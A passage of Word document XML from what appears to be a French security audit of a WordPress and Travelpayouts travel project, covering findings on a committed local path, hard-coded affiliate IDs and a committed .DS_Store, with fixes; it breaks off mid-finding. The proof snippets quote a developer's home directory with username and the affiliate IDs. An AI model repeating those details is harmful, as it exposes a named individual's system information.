          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        $decoded = json_decode( $value, true );</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if ( json_last_error() !== JSON_ERROR_NONE ) return '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return wp_json_encode( $decoded );</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) );</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-004  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Divulgation du chemin local absolu du développeur dans cursor-mcp-config.json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Moyenne]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Divulgation d'information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cursor-mcp-config.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">multiple (cwd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-200 — Exposure of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fichier cursor-mcp-config.json commité contient le chemin absolu du poste de développement : /Users/floriangouloubi/Documents/perso/flashvoyage. Ce chemin expose le nom d'utilisateur système, la structure de répertoires personnels et le nom du projet. Bien que non directement exploitable en production, cela fournit des informations utiles à un attaquant ciblant le développeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">"cwd": "/Users/floriangouloubi/Documents/perso/flashvoyage"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Utiliser des chemins relatifs dans les fichiers de configuration commités :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"cwd": "."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Et documenter la configuration locale dans le README sans la commiter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Ajouter cursor-mcp-config.json au .gitignore ou utiliser cursor-mcp-config.example.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-005  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Identifiants Travelpayouts (TRS/Marker) hardcodés dans le code source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Moyenne]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Secrets / Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">travelpayouts-real-widgets-database.js, wordpress/flashvoyage-widgets.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">multiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-798 — Use of Hard-coded Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les identifiants partenaires Travelpayouts (trs=463418, shmarker=676421) sont hardcodés en dur dans de nombreux fichiers source et dans le plugin WordPress. Bien que ces valeurs soient semi-publiques (elles apparaissent dans les scripts embarqués côté client), leur présence dans le code source commité rend toute rotation difficile et les expose potentiellement à une usurpation de l'identité d'affiliation (clickjacking de liens d'affiliation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$trs      = '463418';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$shmarker = '676421';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Et dans config.js :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const TRAVELPAYOUTS_TRS = process.env.TRAVELPAYOUTS_TRS || '463418';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const TRAVELPAYOUTS_MARKER = process.env.TRAVELPAYOUTS_MARKER || '676421';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne pas fournir de valeur par défaut pour des identifiants monétaires. Les forcer via variables d'environnement :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const TRAVELPAYOUTS_TRS = process.env.TRAVELPAYOUTS_TRS;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const TRAVELPAYOUTS_MARKER = process.env.TRAVELPAYOUTS_MARKER;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if (!TRAVELPAYOUTS_TRS || !TRAVELPAYOUTS_MARKER) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  throw new Error('TRAVELPAYOUTS_TRS and TRAVELPAYOUTS_MARKER must be set');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-006  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">.DS_Store commité dans le repository</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Faible]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration / Hygiène Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.DS_Store (racine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-200 — Exposure of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
